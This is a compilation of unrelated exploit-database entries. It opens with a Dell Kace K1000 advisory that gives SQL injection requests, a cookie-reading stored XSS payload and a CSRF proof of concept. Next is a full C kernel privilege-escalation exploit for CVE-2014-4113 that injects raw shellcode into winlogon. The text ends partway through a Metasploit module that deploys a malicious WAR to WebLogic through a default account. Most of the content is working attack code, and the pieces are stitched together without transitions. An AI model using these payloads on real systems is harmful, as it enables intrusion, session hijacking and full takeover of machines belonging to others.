#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
=====================================================================================================================================================
The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1
Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc
Connection: close
2. Make a note of Content-Length in the response body.
3. Send following request:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
4. Response to above request shows that an error occurred and we are being redirected to /common/error.php
5. Final payload to check if we get the original response back:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
=========================================================================================================================================================
The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability.
An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database.
#Proof-Of-Concept:
------------------
1. Send following request to the target:
GET /adminui/oval_detail.php?ID=6200 HTTP/1.1
Host: 192.168.247.100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.247.100/adminui/oval_list.php
Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0
Connection: close
Upgrade-Insecure-Requests: 1
2. Response to above request shows some content with the content length of 32109 bytes:
3. It shows information about OVAL-ID#24253:
4. Now send following payload that tests this ID parameter for a true condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432
5. Response to above request again shows information about the same OVAL-ID#24252:
6. Now, use following payload to test this ID parameter for a false condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444
7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:
8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405)
=========================================================================================================================================================
The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least privileged user with ‘User Console Only’ rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets that would be executed when administrators or any other user view these tickets.
An authenticated least privileged user with ‘User Console Only’ rights to inject arbitrary JavaScript code on the tickets page. This script executes every time a user visits this page. This allows a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks.
#Proof-Of-Concept:
------------------
1. Log into the Dell Kace K1000 web interface as a least privileged user.
2. Navigate to Service Desk-->Tickets and create a new ticket.
3. Inject following payload in the Summary section:
Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!--
4. Save the ticket.
5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up.
6. Any user, including administrator visiting this ticket page would execute the injected script.
=========================================================================================================================================================
4. Misconfigured CORS Vulnerability (CVE-2018-5406)
=========================================================================================================================================================
The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack.
An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings.
#Proof-Of-Concept:
------------------
1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine.
2. Log into the web interface of the appliance as admin.
3. Open a new tab in the same browser and access the HTML page from #1
4. Save the ticket.
5. Submit the request (This can be modified to submit the request automatically).
6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine
7. Check the admin console to see if user Hacker has been added:
===================================
#Vulnerability Disclosure Timeline:
===================================
04/2018: Submitted report to CERT-US.
04/2018: CERT-US reported the issue to vendor.
05/2018: Awaiting vendor response.
10/2018: Vendor asked to test the patch as they have fixed these issues already.
10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version.
01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch.
05/2019: Vendor published an advisory.
06/2019: CERT-US published a Vulnerability Note, VU#877837.
#include "hd.h"
// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar
byte __s_code[]={
0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,
0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,
0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,
0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,
0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,
0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,
0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,
0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,
0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,
0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,
0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,
0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,
0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,
0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,
0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,
0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,
0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,
0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,
0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,
0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,
0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,
0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,
0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,
0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,
0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3
};
HMENU __init_menu(
)
{
HMENU hMenu_Ret=NULL;
MENUITEMINFO mItem={0};
do
{
HMENU hme=CreatePopupMenu();
if (hme==NULL){
printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError());
break;
}
mItem.cbSize=sizeof(MENUITEMINFO);
mItem.fMask=(MIIM_STRING);
bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);
if (bisok==false){
printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError());
break;
}
hMenu_Ret=CreatePopupMenu();
if (hMenu_Ret==NULL){
printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError());
break;
}
MENUITEMINFO mi={0};
mi.cbSize=sizeof(mi);
mi.fMask=(MIIM_STRING|MIIM_SUBMENU);
mi.hSubMenu=hme;
mi.dwTypeData="";
mi.cch=1;
bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);
if (bisok==false){
printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError());
}
} while (false);
return hMenu_Ret;
}
PVOID __calc_sep_token_addr(
)
{
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION handleInfo=NULL;
ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL;
do
{
_NtQuerySystemInformation NtQuerySystemInformation =
(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject =
(_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject");
_NtQueryObject NtQueryObject =
(_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject");
if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){
printf("get sys proc failed!\n");
break;
}
handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo,
handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
if (!NT_SUCCESS(status)){
printf("NtQuerySystemInformation failed!\n");
break;
}
POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);
for (i = 0; i < handleInfo->HandleCount; i++)
{
SYSTEM_HANDLE handle = handleInfo->Handles[i];
if (handle.ProcessId != GetCurrentProcessId())
continue;
if (!NT_SUCCESS(NtQueryObject(
(HANDLE)handle.Handle,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL
)))
{
printf("[%#x] Error!\n", handle.Handle);
continue;
}
if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)
continue;
if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token"))
continue;
ret_obj_addr=((ULONGLONG)handle.Object+0x40);
}
if (objectTypeInfo)
free(objectTypeInfo);
if (handleInfo)
free(handleInfo);
} while (false);
return (PVOID)ret_obj_addr;
}
ULONGLONG __calc_pid(
)
{
NTSTATUS status;
PSYSTEM_PROCESS_INFORMATION PsInfo=NULL;
ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL;
do
{
_NtQuerySystemInformation NtQuerySystemInformation =
(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation){
printf("get sys proc failed!\n");
break;
}
PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);
while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo,
PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);
if (!NT_SUCCESS(status)){
printf("NtQuerySystemInformation failed!\n");
break;
}
for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))
{
if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)
continue;
if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){
ret_pid=PsInfo->InheritedFromProcessId;
break;
}
}
} while (false);
return ret_pid;
}
ULONGLONG __init_fake_wnd_pti(
)
{
ULONGLONG ret_pti=NULL;
ULONGLONG dst_proc_addr=NULL;
do
{
ret_pti=(ULONGLONG)malloc(0x500);
if (ret_pti==NULL){
printf("malloc fail!\n");
return NULL;
}
*(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0; //Win32Process
*(DWORD*)(ret_pti+_oft_0420h_pti)=0; //not 0x20
*(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5; //TODO:
void* tmpbuf=malloc(0x100);
memset(tmpbuf ,0 ,0x100);
*(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit
} while (false);
return ret_pti;
}
bool __init_fake_tagWnd(
)
{
bool bRet=false;
_ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;
do
{
HMODULE hmd=LoadLibrary("ntdll.dll");
if (hmd==NULL)
break;
ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();
if (fake_tagwnd_pti==NULL){
printf("__calc_wnd_pti() fail!\n");
break;
}
pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory");
if (pfn_ZwAllocateVm==NULL){
printf("pfn ZwAllocateVirtualMemery addr is NULL!\n");
break;
}
BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000;
NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,®ion_size,
MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);
if (status < 0){
printf("Allocate fake tagWnd fail!\n");
break;;
}
ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;
if (ul_align > 0x10000){
printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr);
break;
}
memset(fake_tagWnd_addr+ul_align ,0 ,0x1000);
*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;
*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process
*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed
bRet=true;
} while (false);
return bRet;
}
LRESULT __stdcall __wh_wnd_proc(
int code,
WPARAM wparam,
LPARAM lparam
)
{
do
{
CWPSTRUCT* lpm=(CWPSTRUCT*)lparam;
if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)
break;
g_bis_mn_findwnded=true;
UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);
g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);
} while (false);
return CallNextHookEx(g_hhk ,code ,wparam ,lparam);
}
LRESULT __wnd_proc_sl(
HWND hwnd,
UINT umsg,
WPARAM wparam,
LPARAM lparam
)
{
do
{
if (umsg != MN_FINDWINDOWFROMPOINT )
break;
if (g_bis_endmenu)
break;
g_bis_endmenu=1;
EndMenu();
return 0xFFFFFFFB;
} while (false);
return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);
}
LRESULT __stdcall __wnd_proc(
HWND hwnd,
UINT umsg,
WPARAM wparam,
LPARAM lparam
)
{
if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)
{
g_bis_idled=TRUE;
PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0);
PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0);
PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff);
}
return DefWindowProc(hwnd ,umsg ,wparam ,lparam);
}
DWORD __stdcall __thread_plroc(
void* param
)
{
bool bisok=false;
WNDCLASS wndcls={0};
do
{
wndcls.lpfnWndProc=__wnd_proc;
wndcls.lpszClassName="cve_2014_4113";
RegisterClass(&wndcls);
HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0,
200 ,200 ,NULL ,NULL ,NULL ,NULL);
if (hwnd==NULL){
printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError());
break;
}
HMENU hmenu=__init_menu();
if (hmenu==NULL){
printf("__init_menu() fail: 0x%x\n" ,GetLastError());
break;
}
bool bisok=__init_fake_tagWnd();
if (bisok==false){
printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError());
break;
}
g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());
if (g_hhk==NULL){
printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError());
break;
}
bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);
if (bisok==false){
printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError());
break;
}
CloseHandle(hmenu);
DestroyWindow(hwnd);
} while (FALSE);
return 0;
}
int main(
int argc ,char** argv
)
{
bool bisok=false;
do
{
if (argc != 2){
printf("usage: xxx fpath");
break;
}
HANDLE hProcessToken=NULL ,hRestrictedToken=NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {
printf("Could not open process token\n");
break;
}
if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){
printf("Could not create restricted token\n");
break;
}
if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {
printf("Could not adjust privileges\n");
break;
}
CloseHandle(hProcessToken);
HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);
if (hthread==NULL){
printf("CreateThread() fail: 0x%x\n" ,GetLastError());
break;
}
WaitForSingleObject(hthread ,1000);
TerminateThread(hthread ,0);
if (!ImpersonateLoggedOnUser(hRestrictedToken)){
printf("ImpersonateLoggedOnUser failed!\n");
break;
}
PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA");
if (pfn_cps==NULL){
printf("GetProcess CreateProcessA failed!\n");
break;
}
ULONGLONG ul_pid_winlogon=__calc_pid();
if (ul_pid_winlogon==NULL){
printf("__calc_winlogon_pid failed!\n");
break;
}
HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);
if (hprocess==NULL){
printf("OpenProcess failed: %x\n" ,GetLastError());
break;
}
//init params
PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);
if (params==NULL){
printf("VirtualAllocEx failed:%x\n" ,GetLastError());
break;
}
ULONGLONG ul_ret_wrt=0;
bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);
if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){
printf("WriteProcessMemory() failed!\n");
break;
}
//init shellcode
PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);
if (shellcode==NULL){
printf("VirtualAllocEx failed:%x\n" ,GetLastError());
break;
}
bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);
if (bisok==false || ul_ret_wrt < sizeof(__s_code)){
printf("WriteProcessMemory() failed!\n");
break;
}
DWORD dw_tid=0;
HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);
if (htd_rmt==NULL){
printf("CreateRemoteThread() fail!\n");
break;
}
//clear
CloseHandle(htd_rmt);
CloseHandle(hprocess);
CloseHandle(hRestrictedToken);
} while (false);
return 0;
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',
'Description' => %q{
This module abuses a feature in WebLogic Server's Administration Console to install
a malicious Java application in order to gain remote code execution. Authentication
is required, however by default, Oracle ships with a "oats" account that you could
log in with, which grants you administrator access.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Steven Seeley', # Used the trick and told me about it
'sinn3r' # Metasploit module
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'WebLogic Server Administration Console 12 or prior', { } ]
],
'References' =>
[
# The CVE description matches what this exploit is doing, but it was for version
# 9.0 and 9.1. We are not super sure whether this is the right CVE or not.
# ['CVE', '2007-2699']
],
'DefaultOptions' =>
{
'RPORT' => 8088
},
'Notes' =>
{
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'Privileged' => false,
'DisclosureDate' => 'Mar 13 2019',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),
OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])
])
register_advanced_options(
[
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
])
end
